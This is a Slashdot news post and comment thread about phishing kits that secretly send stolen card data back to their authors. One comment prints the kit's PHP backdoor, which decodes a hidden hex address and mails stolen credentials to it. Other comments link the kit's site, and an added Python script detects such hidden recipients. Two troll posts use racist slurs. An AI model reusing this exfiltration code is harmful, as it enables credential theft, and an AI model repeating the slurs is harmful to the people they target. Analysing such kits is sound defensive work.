
Phishing Group Caught Stealing From Other Phishers

samzenpus posted more than 6 years ago | from the what's-good-for-the-goose dept.

Security 129

An anonymous reader writes "Netcraft has written about a website offering free phishing kits with one ironic twist — they all contain backdoors to steal stolen credentials from the fraudsters that deploy them. Deliberately deceptive code inside the kits means that script kiddies are unlikely to realize that any captured credit card numbers also end up getting sent to the people who made the phishing kits. The same group was also responsible for another backdoored phishing kit used against Bank of America earlier this month."


129 comments


Optimum online so fast, so fine (0, Offtopic)

pyro_dude (15885) | more than 6 years ago | (#22162232)

Frist ps0t

Re:Optimum online so fast, so fine (-1, Offtopic)

Mouthless Wolf (1153783) | more than 6 years ago | (#22162272)

Cool.

Re:Optimum online so fast, so fine (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22162390)

R.I.P. Heath Ledger [blogspot.com]

How times have changed: you can't trust.....wait! (3, Interesting)

whoever57 (658626) | more than 6 years ago | (#22162254)

But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.

Re:How times have changed: you can't trust.....wai (5, Interesting)

cortesoft (1150075) | more than 6 years ago | (#22162310)

Except they are actually double feeding off innocent people.... some poor chap's info gets stolen by both the guy who deployed the phishing kit and the guy who wrote it.... which means it's probably at least twice as likely to get used for fraud.

Re:How times have changed: you can't trust.....wai (4, Insightful)

v1 (525388) | more than 6 years ago | (#22162434)

they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?

Re:How times have changed: you can't trust.....wai (2, Interesting)

mh1997 (1065630) | more than 6 years ago | (#22165534)

they aren't really feeding off each other, just more off YOU. Both thieves get a crack at your cc#. Would you rather have rung up $4000 on your card, or $8000?
It really does not matter how much is fraudulently charged on my credit card. I am not responsible for either amount.

Looking at the larger picture, I want as small amount of fraud as possible because the cost of goods will be cheaper. Somebody has to recoup that $4000 or $8000 in your example, but what happens, everyone pays for fraud, but spread out over every purchase made, it is probably lower than the sales tax you pay on each individual transaction.

For what it's worth, I have found a way to never have my credit card info stolen - I use cash. For you conspiracy minded people out there, my purchases are not trackable. Even better, the amount of debt I have is $0 which comes out to $0 per month in interest with a grand total of $0 per year. You'd also be amazed at the businesses (big box stores and little local stores) that will give you a discount for cash if you ask.

Re:How times have changed: you can't trust.....wai (3, Insightful)

GroeFaZ (850443) | more than 6 years ago | (#22162540)

Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".

Re:How times have changed: you can't trust.....wai (2, Funny)

cart_man4524 (623980) | more than 6 years ago | (#22163288)

hmmm....reminds me of something very familiar Oh yea....it sounds like American Business, so what's the problem?

Re:How times have changed: you can't trust.....wai (1)

Dr_SimonCPU (1181635) | more than 6 years ago | (#22165098)

hmmm....reminds me of something very familiar Oh yea....it sounds like American Business, so what's the problem?
The smart ones are not the ones on the top, unfortunately.

Re:How times have changed: you can't trust.....wai (2, Interesting)

Zeinfeld (263942) | more than 6 years ago | (#22165704)

Problem is, they're not feeding on each other; the feeding order is not circular, but rather pyramidal. The smart and resourceful ones get even richer through the bottom-feeders' "work".

Exactly, in the chat rooms the criminals are far more worried about each other than the forces of law and order. OK they are concerned that the person might be from a security company (our guys) or a police officer. But they are rather more angry about 'rippers' -criminals who take the money but never deliver the goods or take goods and don't pay for them.

In the shadowcrew organization about a third of the management team was occupied as enforcers. In fact that is how they got caught, they ended up in a turf war and someone turned them in to police.

As in all criminal organizations the guys at the bottom get chicken feed. All the money flows up the pyramid, just like the Sopranos. A street drug dealer is likely to be in prison or dead in two to three years on average and makes less than minimum wage. The typical botnet herder makes less than they would flipping burgers. All the money flows up.

Re:How times have changed: you can't trust.....wai (4, Insightful)

bhmit1 (2270) | more than 6 years ago | (#22162746)

But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.
This would only be a good thing if phishers were stealing the account information of other phishers. But since they are just spreading your number to more phishers, your best hope is that competing phishers raise the fraud alert on your credit cards faster (credit card companies look for unusual purchases, and placing multiple orders in stores on opposite sides of the country at the same time is a pretty easy flag for them).

Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source. Then everyone receiving this spam can provide so many bad account numbers that phishing is very difficult to do without drawing attention to yourself.

Re:How times have changed: you can't trust.....wai (2, Interesting)

morethanapapercert (749527) | more than 6 years ago | (#22163432)

There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of fishing is to look as safe and legit as possible*. If, for example, my mother-in-law from Mr. BadGuy Phisher gets an email offering (of all things) heavily discounted embroidery pattern files for her embroidery machine. She thinks he really has such files for sale, she actually does want the product, so she provides her real CC# and not the false one. Now, this is a woman who is keenly aware of the potential for credit card fraud and identity theft. I have seen her save all of her receipts and manual charge slips in a shopping bag so her husband can burn them out in the shop. She is convinced that Bad Men are rooting through trash to collect CC's and banking info. She is convinced that these Bad Men are somehow able to access her account based on the string of numbers that appear on the receipt when she uses her debit card.
  Yet, despite this paranoia, she still buys hordes of knick-knacks, limited edition "collectibles", sewing supplies and such on EBay. Paypal being too scary for her, she uses her CC to pay for all of that. Try as I might, I can't seem to persuade her that a person in CA selling cutesy crocheted animal sweaters could be a Bad Man just as easily as some person rooting through her trash. As for email based scams; well, I set up her email client to reject anyone not already in her address book and have trained her in the habit of sending the initial email to them, rather than waiting until she gets one. As a major side benefit for me, it has drastically cut down the number of "cute", "humorous" or "inspirational" forwards she sends me.

*The bar to appear safe and legit enough for some users can be staggeringly low. Let's face it, there are always going to be some stupid people around.

Re:How times have changed: you can't trust.....wai (1)

xenocide2 (231786) | more than 6 years ago | (#22163576)

Man. Remember when people wanted to use Credit Card numbers as proof of age for adult materials? Glad that never happened!

Re:How times have changed: you can't trust.....wai (0)

Anonymous Coward | more than 6 years ago | (#22165716)

Man. Remember when people wanted to use Credit Card numbers as proof of age for adult materials? Glad that never happened!

 
Not so. My mobile company still does that.

Re:How times have changed: you can't trust.....wai (1)

TroopaCabra (787941) | more than 6 years ago | (#22164288)

RE: There is one slight flaw with that plan. How does a victim know when to give the trojan CC# and when to give the real one? The whole point of fishing is to look as safe and legit as possible*. ...C'mon- you can't spot an email from phishers? Not everyone will be able to recognize a phishing scheme- but a large percentage will. That's all that matters once the rest is in operation. No?

Re:How times have changed: you can't trust.....wai (4, Interesting)

morcego (260031) | more than 6 years ago | (#22164068)

Personally, I still want to see financial institutions implement a system where you can get trojan account numbers to give to the phishers that appear just like real numbers. If the phisher uses them, immediately the institution knows to look for fraudulent activity from that source.


One of my ATM cards has 2 different pin numbers. If I use the alternative one, the transaction is completed normally (so no one on the spot gets wiser), but the institution will flag it and notify the police at once, providing my identity and location. I have to pay a little extra for it (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have had this since 1996, and I'm happy to say I never needed it.

So yes, the banks know this kind of thing can be done. I wonder why other institutions don't do it or even why this is not mandatory for all cards.

I really don't mind the extra US$ 3/month for this service.

Re:How times have changed: you can't trust.....wai (1)

deroby (568773) | more than 6 years ago | (#22164656)

But that would only be useful when you're somehow "forced" to give your PIN isn't it (eg. when there's a gun to your head).

In the case of phishing you simply do not realize that you're giving away information to a fraud! You actually truly, veritably believe that you're doing something harmless, eg. paying for that book on Amazon (probably a bad example, but you get the drift). So why would you use the 'poisoned-PIN' in this situation ?

FYI : this reminds me of that urban legend where you were supposed to enter your PIN backwards to get the same effect (transaction works out OK but police is informed right away, etc...), amazing how many people believed that story... until I asked them what then would happen if your PIN read 1221. (yes, it *used* to be an old PIN number of mine, actually, it was my first ever... and no, that was 15 years ago and it's been changed plenty of times in the meantime and no, no use looking me up, I don't plan on using it again =)

Re:How times have changed: you can't trust.....wai (1)

Maximum Prophet (716608) | more than 6 years ago | (#22165744)

While this is an urban legend, several legislatures have proposed requiring banks to have PIN "Panic Codes". http://www.snopes.com/business/bank/pinalert.asp [snopes.com]
In the case of palindromic codes, just flip them inside out. i.e. 1221 becomes 2112.

Re:How times have changed: you can't trust.....wai (1)

Ajaxamander (646536) | more than 6 years ago | (#22166236)

And what if my PIN is 1111? Should I enter the two's-complement?

Re:How times have changed: you can't trust.....wai (3, Informative)

nacturation (646836) | more than 6 years ago | (#22165050)

I have to pay a little extra for it (about US$ 3/month), but it is well worth it. It is considered (and marketed as) an insurance. I have had this since 1996, and I'm happy to say I never needed it.
I have a solution as well: use your credit card so that there's no liability to you even if someone does use it fraudulently. And since 1996, you've spent about $400 on this insurance you didn't need. The only time I could see that as being useful is if someone robs you while you're in the process of making a withdrawal at an ATM.
 

Re:How times have changed: you can't trust.....wai (2)

morcego (260031) | more than 6 years ago | (#22165792)

There is a new fad around criminals in my country that is called "flash kidnapping" (loose translation). They grab you, put a gun in your head, and drive you around to several ATM machines.

Re:How times have changed: you can't trust.....wai (1)

Kokuyo (549451) | more than 6 years ago | (#22164620)

I'd prefer a system where I could generate a credit card number every time I made a purchase online. Naturally, this is not going to work in stores or such, but at least online you could limit the damage one could do because the number works just once. Furthermore by noting where you've used the number you'd know exactly who has been leaking or misusing your number.

Re:How times have changed: you can't trust.....wai (1)

budgenator (254554) | more than 6 years ago | (#22165372)

What I want to see is financial institutions starting to use my chummer program [slashdot.org] ; catch a phishing site and send the sharks a couple GB of stinking fish guts quality data, until the computer crash and burn from the strain.

Re:How times have changed: you can't trust.....wai (0)

Anonymous Coward | more than 6 years ago | (#22166244)

Many credit card companies offer a free, online service to generate a one-time use CC# (I know Citi and Discover are doing this). You just log on to your account, generate a number for online purchase, and it is only valid to be used that one time.

It allows you to make your purchase online a single time, and if that number gets stolen, any transactions on it are flagged as not yours. At that point, giving out your real number, ever, seems poor, unless you are trying to set up recurring charges.

This isn't the same... (3, Insightful)

TheGreatHegemon (956058) | more than 6 years ago | (#22162972)

In the old days, if thieves stole from thieves, it meant the first thief was deprived of the stolen goods. This led to conflict. However, with information like this, all it means is that *two* thieves have the same info.

Re:This isn't the same... (1)

MrShaggy (683273) | more than 6 years ago | (#22163108)

Twice the fun, none of the work. MMMM

Phishers have always done this. (0)

Anonymous Coward | more than 6 years ago | (#22163044)

This isn't news. Phishers have always taken advantage of script kiddies to obtain more credit card numbers or the like. Slashdot feels like it is run by 13 year olds. They know what a GeForce 8800 Ultra is, they know what DDR RAM is, they know what Linux and Unix is, but they are hardly advanced computer users.

Re:Phishers have always done this. (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22163390)

I went to college with Rob and Jeff. "13 year olds" is right. Kind of like Beavis and Butthead, except gay. It was funny at first, but then you realize it wasn't an act.

There's no Such Thing as a Free Lynch (1)

Morosoph (693565) | more than 6 years ago | (#22163114)

Not wanting to spoil the optimistic spirit of your own post :o)

Re:How times have changed: you can't trust.....wai (1)

Technician (215283) | more than 6 years ago | (#22164210)

But seriously, this is good news! It is always good news (for law-abiding people) when crooks start feeding off each other.

I read an even better possibility into this. What if the kit was released by VISA/Master card, Discover, and American Express. They would have a front line into shutting down stolen card numbers, canceling cards and getting great data including IP addresses. Working with merchants, they could follow the canceled sales for a great bust of the ring. Brilliant if true.

Share (4, Funny)

Anonymous Coward | more than 6 years ago | (#22162278)

Hey, it's open source. Information wants to be free. It's all about sharing. Why shouldn't the developer of the phishing kit get some reward from the organization that profits from repackaging his code?

If they really wanted to do it right, they could just pool all their resources and split the rewards. They could even invite others to join in, with a BotNet@Home project. Lend your computer to the BotNet, and get a prorated share of the take from stolen credit cards credited to your PayPal account.

Re:Share (0)

Anonymous Coward | more than 6 years ago | (#22162408)

Hell yeah, let's do that! I'll opt in.

(I'm a GNU/Linux user, so I actually have to opt in if I want to party... :)

Re:Share (2, Funny)

nacturation (646836) | more than 6 years ago | (#22165066)

They could release it under the GNU General Phishing License.
 

Re:Share (1)

budgenator (254554) | more than 6 years ago | (#22165416)

I was trying to find the download site, I'd like to see state of the art phishing code myself; if they want data, I could send them a few TB for fun.

Typical niggers. (-1, Troll)

Anonymous Coward | more than 6 years ago | (#22162280)

95% of them are criminal, you know.

RON PAUL '08

Poor script kiddies (0)

Anonymous Coward | more than 6 years ago | (#22162284)

Maybe they should bring charges against the script makers. That'd show everyone involved!

It's a little too soon for "backdoor" articles. (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22162286)

RIP Heath Ledger

[trolling subject line] (-1, Offtopic)

Anonymous Coward | more than 6 years ago | (#22162292)

[inflammatory comment]

Re:[trolling subject line] (1)

PenGun (794213) | more than 6 years ago | (#22162450)

Ahhh! The meta master. [];

In soviet russia... (5, Funny)

Anonymous Coward | more than 6 years ago | (#22162298)

...phishers phish phishers... Say that five times fast.

Re:In soviet russia... (2, Funny)

Anonymous Coward | more than 6 years ago | (#22162810)

"that that that that that"

Not so hard...

Re:In soviet russia... (0)

Anonymous Coward | more than 6 years ago | (#22163472)

More like "Phishers phuck phraudsters ophphering phishing sophtware"

Re:In soviet russia... (1)

TroopaCabra (787941) | more than 6 years ago | (#22164318)

I have trouble saying it once~

This is great news (0)

www.tech4um.com (1218400) | more than 6 years ago | (#22162308)

Now if my mom falls victim to a phishing scam, I can rest assured now that her information is in the hands of even more phishers.

Re:This is great news (1)

Cheezymadman (1083175) | more than 6 years ago | (#22162598)

If your mom (or anyone for that matter) falls "victim" to phishing, they fucking deserve it. Anyone willing to hand out their credit card info to any website that looks moderately safe is a tool, and doesn't deserve to have a card.

Re:This is great news (1)

Kasimir Gabert (1046658) | more than 6 years ago | (#22162850)

... because everybody in the world reads Slashdot? Look outside of yourself, at least once a month. I think it would be healthy :)

Re:This is great news (1)

Cheezymadman (1083175) | more than 6 years ago | (#22162912)

If you're using the internet, you need to have some common sense. It's as simple as not using a site unless you see the exact url you want in the address bar.

Turning the tables on the phishers... smart! (-1, Troll)

Anonymous Coward | more than 6 years ago | (#22162312)

Judo in action.

Now let's brainstorm on how we can turn niggers from a problem into an advantage. Air drop them into Iraq?

Ron Paul 2008

The anti/phisher cat-and-mouse game sounds fun (0)

Anonymous Coward | more than 6 years ago | (#22162322)

World of Netcraft.

Re:The anti/phisher cat-and-mouse game sounds fun (1)

Nullav (1053766) | more than 6 years ago | (#22163098)

Netcraft confirms it?

Proverb (5, Funny)

OldManAndTheC++ (723450) | more than 6 years ago | (#22162330)

Phish from a man and you take advantage of him for a day.

Give a man a phishing kit and you take advantage of him for a lifetime.

(of course by "man" we mean spotty-faced script kiddie, and by "lifetime" we mean until he wipes his harddisk, but proverbs are meant to be pithy and brief, not accurate.)

Re:Proverb (1)

GroeFaZ (850443) | more than 6 years ago | (#22162556)

Well, you summarized TFA. Bonus points for avoiding a car analogy.

Re:Proverb (1)

cbotman (1213408) | more than 6 years ago | (#22162838)

Pithy means 'brief and forceful', so you don't need to say brief again. :)

I wish it were possible to zoom in... (1)

DutchSter (150891) | more than 6 years ago | (#22162370)

Of course all the big names are listed (Bank of America, Regions, etc), but it's too bad you can't zoom in on the screen shots. My local financial institution has been getting phished like crazy lately and it's always the same basic kit. Makes me wonder if it's this kit or something else. Whenever I get one of the emails I just have to check it out on my Mac Book in Firefox with JS disabled just to see if it's anything novel. Never is.

Naturally Netcraft won't tell you the real site name :-)

Re:I wish it were possible to zoom in... (3, Funny)

Anonymous Coward | more than 6 years ago | (#22162658)

I wait until I am at work to read those emails, I'm not going to risk my own computers.

Re:I wish it were possible to zoom in... (1)

mrv20 (1154679) | more than 6 years ago | (#22164498)

Don't mind the thudding sound you can hear in the background - it's just your sysadmin banging his/her head against the nearest wall in despair.

Re:I wish it were possible to zoom in... (5, Informative)

Mr. Roadkill (731328) | more than 6 years ago | (#22162686)

Naturally Netcraft won't tell you the real site name :-)
Naturally. And who can blame them? I certainly don't - who knows what kind of nasties they might have lurking on those pages waiting for unsuspecting CEO's and CIO's and security experts who ought to know better?

However, Google is your friend. Within 30 seconds of looking over the Netcraft article for helpfully unique strings, I found it. And went looking with lynx :-) I won't give the URL, to protect the stupid from themselves, but it's not that hard to find.

They've got ready-rolled scams for abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc.co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com - and in some cases, they have more than one for particular organisations.

Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?

Re:I wish it were possible to zoom in... (0)

Anonymous Coward | more than 6 years ago | (#22164034)

They've got ready-rolled scams for [...] stgeorge.com.au...
Who?

Oh wait, you're an Australian and desperate to mix with the big boys. Sorry.

Re:I wish it were possible to zoom in... (1)

ASBands (1087159) | more than 6 years ago | (#22164300)

All the e-mail formatting seems to come from the "Mr-Brain.php" file. I'm not sure about how this Mr-Brain character licenses his software, but I figure it is some form of creative commons or (L)GPL, so I should be fine with attribution. So: the following source code was created by Mr-Brain and last updated 2008-Jan-07. If you would like to contact him, please send an e-mail to al-brain@hotmail.fr [mailto] or albrain08@yahoo.fr [mailto] .

Never mind, I ran into the lameness filter of Slashdot for this guy's source code. Seems fitting. Messages are sent to the e-mail al-brain@hotmail.fr and the e-mail albrain08@yahoo.fr with the subject "BankofAmerica ReZulT | $ccno | $ip", sent with the header "From: Mr-Brain". If you want the exact format, just go to his site (thebadboys[dot]org[slash]Brain) and download the source (Mr-Brain.php).

This is for a Bank of America scam, but I'm assuming that the file is identical for the majority of the scams (which involve personal information), so the e-mail format will work everywhere. Anybody who feels the need to send personalized e-mail to Mr-Brain, please send them to the email address al-brain@hotmail.fr or the email address albrain08@yahoo.fr. Hopefully, he'll be very interested in free v1agra.

And, uh
email: al-brain@hotmail.fr
email: albrain08@yahoo.fr

The real backdoor email address... (2, Informative)

Anonymous Coward | more than 6 years ago | (#22164512)

It looks like you too have been misled by the code. The email addresses al-brain@hotmail.fr and albrain08@yahoo.fr are the ones that the 'script kiddies' are meant to change before using the phishing kit. The backdoor email address is actually encoded within the other scripts.

Looking at the code more carefully you'll see..

details.php includes this in the phishing page form:

logon.php has these lines of code:
    $d="details.php";
    $erorr=file_get_contents($d);
    $IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));

and Mr-Brain.php has this:
    $send="al-brain@hotmail.fr,albrain08@yahoo.fr";
    $str=array($send, $IP);
    foreach ($str as $send)
        mail($send,$subject,$message,$headers);

Basically, it pulls the "niarB" value from the page, decodes it, and then it is included in the array of email addresses that the details get mailed to.

The Brain's backdoor email address turns out to be: pioneer.brain@gmail.com

Re:The real backdoor email address... (0)

Anonymous Coward | more than 6 years ago | (#22164576)

The hidden encoded value from details.php is:
    input type="hidden" name="niarB" value="10270696f6e6565722e627261696e40676d61696c2e636f6d"

Re:The real backdoor email address... (0)

Anonymous Coward | more than 6 years ago | (#22165222)

I got "brain.pioneer@gmail.com" as the email address from the HSBC scripts.

I would have thought that there would be more obfuscation here? It's not exactly difficult to spot that he's sending mails to an array containing whatever email address the kid puts in and some other variable!
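Added example (not part of any comment above, and not the kit's own code): a small triage script, written from the analyst's side, that replays the `pack`/`substr`/`strpos` decoder quoted from logon.php and also scans for any hex-encoded address, so every mailbox a seized kit reports to can be listed. `SAMPLE_KIT` is constructed from only the lines quoted in this thread; the function names are hypothetical, and the generic hex scan goes beyond the single "102" marker case discussed here.

```python
import re

EMAIL = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")
HEX_RUN = re.compile(r"[0-9a-fA-F]{20,}")
# Shape of the decoder quoted from logon.php:
#   pack("H*", substr(<text>, strpos(<text>, "<marker>")+<skip>, <length>))
PACK_SUBSTR = re.compile(
    r'pack\(\s*"H\*"\s*,\s*substr\(.*?strpos\([^,]+,\s*"([^"]+)"\s*\)'
    r'\s*\+\s*(\d+)\s*,\s*(\d+)\s*\)\s*\)'
)
FOREACH = re.compile(r"foreach\s*\(\s*(\$\w+)\s+as\s+(\$\w+)\s*\)")

# Constructed sample: only the lines quoted in the comments, keyed by file name.
SAMPLE_KIT = {
    "details.php": 'input type="hidden" name="niarB" '
                   'value="10270696f6e6565722e627261696e40676d61696c2e636f6d"',
    "logon.php": '$d="details.php";\n'
                 '$erorr=file_get_contents($d);\n'
                 '$IP=pack("H*", substr($VARS=$erorr,strpos($VARS, "102")+3,46));',
    "Mr-Brain.php": '$send="al-brain@hotmail.fr,albrain08@yahoo.fr";\n'
                    '$str=array($send, $IP);\n'
                    'foreach ($str as $send)\n'
                    '    mail($send,$subject,$message,$headers);',
}


def replay_decoder(kit):
    """Re-run each pack/substr/strpos decoder against every file in the kit.

    Returns {address: (file holding the decoder, file holding the hex)}.
    """
    found = {}
    for src, code in kit.items():
        for marker, skip, length in PACK_SUBSTR.findall(code):
            for name, text in kit.items():
                pos = text.find(marker)
                if pos < 0:
                    continue
                start = pos + int(skip)
                chunk = text[start:start + int(length)]
                try:
                    decoded = bytes.fromhex(chunk).decode("latin-1")
                except ValueError:
                    continue  # not hex, e.g. the marker literal in the decoder
                for addr in EMAIL.findall(decoded):
                    found[addr] = (src, name)
    return found


def hex_hidden_addresses(kit):
    """Generalisation: decode every long hex run at a few start offsets.

    The offsets cover a short prefix (such as "102") that is itself made of
    hex digits and therefore merges with the encoded data.
    """
    found = {}
    for name, text in kit.items():
        for run in HEX_RUN.findall(text):
            for off in range(4):
                digits = run[off:]
                digits = digits[:len(digits) - len(digits) % 2]
                decoded = bytes.fromhex(digits).decode("latin-1")
                for addr in EMAIL.findall(decoded):
                    found.setdefault(addr, name)
    return found


def extra_mail_recipients(text):
    """Variables mailed to in a foreach loop besides the loop variable itself."""
    extra = []
    for arr, item in FOREACH.findall(text):
        if not re.search(r"mail\(\s*" + re.escape(item) + r"\b", text):
            continue
        m = re.search(re.escape(arr) + r"\s*=\s*array\(([^)]*)\)", text)
        if m:
            extra += [v for v in re.findall(r"\$\w+", m.group(1)) if v != item]
    return extra


def triage(kit):
    """Summarise every destination the kit can mail captured data to."""
    hidden = set(replay_decoder(kit)) | set(hex_hidden_addresses(kit))
    configured = {a for text in kit.values() for a in EMAIL.findall(text)}
    extras = {name: extra_mail_recipients(text) for name, text in kit.items()}
    return {
        "configured": sorted(configured),
        "hidden": sorted(hidden - configured),
        "extra_recipient_vars": {n: v for n, v in extras.items() if v},
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_KIT).items():
        print(key, value)
```

A non-empty `hidden` list, or a variable in `extra_recipient_vars` that is not set from the visible configuration, is the signal that a kit reports to someone other than whoever deployed it.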

Re:I wish it were possible to zoom in... (1)

Maximum Prophet (716608) | more than 6 years ago | (#22165800)

Cool. Now who has a spare botnet, is willing to wade through this arsehole's source, and is willing to send garbage values to al-brain@hotmail.fr and albrain08@yahoo.fr?
I would hope that would be the security guys at abbey.co.uk, bankofamerica.com, cahoot.co.uk, chase.com, egold.com, ebay.com, hsbc.co.uk, lloydstsb.com, moneybookers.com, nationwide.co.uk, nbk.com.kw, paypal.com, regions.com, stgeorge.com.au, wachovia.com and westernunion.com.

All they have to do is send some trojan card numbers that "work", but are quickly traceable. Then send the cops to the addresses that the crooks are sending stuff to, or catch them at the store where they try to use the CC number.

Re:I wish it were possible to zoom in... (1)

budgenator (254554) | more than 6 years ago | (#22165454)

Check this out, I lost the code in a hard-drive failure but it's only one notch past "hello world" anyways so if you can't both learn Perl and rewrite chummer.pl [slashdot.org] in a half hour you don't belong in IT anyways.

Mr-Brain's site (5, Informative)

aerthling (796790) | more than 6 years ago | (#22162458)

Here's his site: http://thebadboys.org/Brain/ [thebadboys.org]

Re:Mr-Brain's site (0)

Anonymous Coward | more than 6 years ago | (#22166052)

Mod flamebait. This shouldn't just be laid in plain. And besides, any slashdotter who is really interested should find it easily.

SCANDALOUS! (0)

davidsyes (765062) | more than 6 years ago | (#22162470)

Scandalous I say! this is just tooo literally virtually phishy. Thieves without a code of honour. Is there no honour among thieves? Real fishermen can't ... wait, they can poach, and steal other's fish.

Anybody got a literal virtual stick of dynamite to blow up the caught fish?

Re:SCANDALOUS! (1)

Lewrker (749844) | more than 6 years ago | (#22162774)

A better analogy would be poachers selling poaching kits to frustrated adolescents which would trap the said script-kiddie and signal the real poacher to collect and skin both dumb animals.

Re:SCANDALOUS! (1)

arivanov (12034) | more than 6 years ago | (#22165816)

I suggest you watch "Specifics of the Russian National Fishing" aka "Osobennosti Nacionalnoi Rubalki" on the subject of dynamite and fishing. You will laugh your a*** off...

This is really sad.. (5, Interesting)

DigitAl56K (805623) | more than 6 years ago | (#22162506)

.. you just can't trust malware anymore!

Really though, this is nothing new. IIRC, some builds of Sub7 [wikipedia.org] had a reverse backdoor (not covered in the wiki article), as well as a master password that let the Sub7 crew take over a server (covered by the wiki article), and some builds even included hard drive killer when the master password was in use.

Re:This is really sad.. (1)

LilGuy (150110) | more than 6 years ago | (#22163440)

Sub7 wasn't the first. DeepThroat was the first major trojan to do this. It really sucked when the author convinced me and all my other IRC acquaintances to use it instead of BO and eventually told me he had a master password on it. By the time he gave the password to me his trojan was picked up by most of the major AVS' of the day. Dirty scoundrels. ;)

Nuke the phishers (4, Insightful)

enoz (1181117) | more than 6 years ago | (#22162518)

What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

It reminds me of the ol' days on instant messaging when people would pass around a supposed 'Nuke' program that would allow them to reboot people's computers, only to discover that their own computer crashed soon after.

Re:Nuke the phishers (1)

gotzero (1177159) | more than 6 years ago | (#22162560)

Hopefully if we get people far enough down the ladder this would actually work. Why not just flood the database with bad info? Hopefully having to sort through it would make it bad enough...

Re:Nuke the phishers (4, Informative)

FLEB (312391) | more than 6 years ago | (#22162644)

What is stopping a law enforcement agency from putting out a 'phishing' kit that actually phished the phishers?

The law, mostly. It's just as illegal for someone to make "counter-malware" to break into a computer uninvited as it is for anyone else to make malicious software that breaks in.

Just what is stopping law enforcement? (3, Interesting)

swb (14022) | more than 6 years ago | (#22162736)

Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?

Isn't it trivial for a government agency like the FBI or Treasury to track payments charged to any kind of electronic banking back to the recipient? Wouldn't an investigation "following the money" ultimately lead you to either the thief or at least greatly disrupt his activities? At a minimum it would expose the people that made their transactions work (banks, hosting companies, other otherwise "normal" business people).

A couple of decent RICO prosecutions and you would drive this stuff out of the United States and greatly reduce the scale of it.

But it never happens, and I can only think that somehow the government has somehow turned these people into some espionage rabbit hole and high level prosecutions would disrupt intelligence gathering. Because there is little reason the government couldn't do something about it if they wanted to.

Re:Just what is stopping law enforcement? (1)

NemoinSpace (1118137) | more than 6 years ago | (#22162986)

I am guessing you haven't considered Cock-up theory? [wikipedia.org]

Re:Just what is stopping law enforcement? (0)

Anonymous Coward | more than 6 years ago | (#22163754)

Your link uses the term cock-up in a quote; it does not actually describe what the actual theory behind that term is. Or does the whole theory consist of only those few quotes?

Re:Just what is stopping law enforcement? (1)

MishgoDog (909105) | more than 6 years ago | (#22163592)

Because it would take just one 'blind' using a bank account such as a Swiss bank account to foil the 'follow the money' approach. International co-operation is never at its best when it involves significant amounts of money flowing INTO a country. It's simply not that simple.

Re:Just what is stopping law enforcement? (0)

Anonymous Coward | more than 6 years ago | (#22163628)

The problem is that most phishers don't bother to use the credit cards they get. They really can't since they quickly get too many to personally use. Instead they will sell the credit card lists to other crooks, who can then use the credit cards. Most of the time the theft is not investigated. (Investigating it is the responsibility of the credit card company. But they are happy to just write it off as shrinkage.) If it is investigated, and the perp is caught, you still haven't found the phisher.

For an additional challenge, a significant fraction of this type of crime comes from Russia. Which complicates any law enforcement efforts since the criminals generally have greased the appropriate palms.

Re:Just what is stopping law enforcement? (4, Informative)

ShaunC (203807) | more than 6 years ago | (#22163650)

Don't you ever wonder why there have been so few significant arrests of spammers/phishers/etc?
No, not really.

For the most part, these have been made federal crimes, even to the extent of superseding existing state laws. A few years ago, several states had passed fairly strong anti-spam laws. If someone violated the law, you could file against them in your local small claims court, and secure a guaranteed judgement (good luck collecting, but that's another story) if they didn't show. Slashdot regular Bennett Haselton made boilerplate of that process, as I recall. Then along came CAN-SPAM, which created huge loopholes and essentially declared that individual state laws about spam, if less tolerant than the federal statute, were no longer enforceable.

So now it's up to the feds to prosecute spammers, phishers, and other ill-willed malfeasants. Most of the time, the feds have better things to worry about, and unless you personally can prove tens of thousands in damages, they're unlikely to raise an eyebrow. You do remember how the FBI's last few technology initiatives turned out, right? The penultimate example being "Virtual Case File," a/k/a "Virtual Money Sink." What amounts to a data warehouse with a client app to query it, $200 million later and it's scrapped. Two hundred MILLION dollars down the drain on a failed initiative to, in essence, secure some data feeds, create some transformations, and develop a GUI to query the whole shebang. You really expect these guys to track down John Dodrescu in Romania who's spoofing a Bank of America website on some zombie PCs in Italy, oh wait, that was 10 minutes ago before the TTL on the DNS expired, now it's some zombie PCs in France?

Give me, a non-gov IT professional, a team of 10 people of my choosing, fund me with one single million dollars and some travel vouchers, and agree to keep the project going for one year. A lot of these assholes will be out of business inside of 6 months, with many of their contemporaries scared shitless of becoming the next statistic. No fatalities, just a lot of people behind bars. But the federal government doesn't work that way because as many of us are well aware, it isn't profitable to run an IT department. They'd rather hire 1,000 guys who may or may not be able to tell you which of (XM|XP|XTC) is a version of Windows, at $50K a year apiece, then bitch and moan that they can't stop the problem with $50mil so they can justify a bigger budget next year.

America is spending more money per day in Iraq than it would take to adequately investigate, build cases against, and convict all of the prolific spammers in the entire world.

No, I don't often wonder why these problems haven't been solved. The federal government has been tasked with solving them, and that's all the why I need.

Re:Just what is stopping law enforcement? (1)

noidentity (188756) | more than 6 years ago | (#22164150)

You do remember how the FBI's last few technology initiatives turned out, right? The penultimate example being "Virtual Case File," a/k/a "Virtual Money Sink."

No, but it makes me curious of the ultimate example.

Re:Just what is stopping law enforcement? (1)

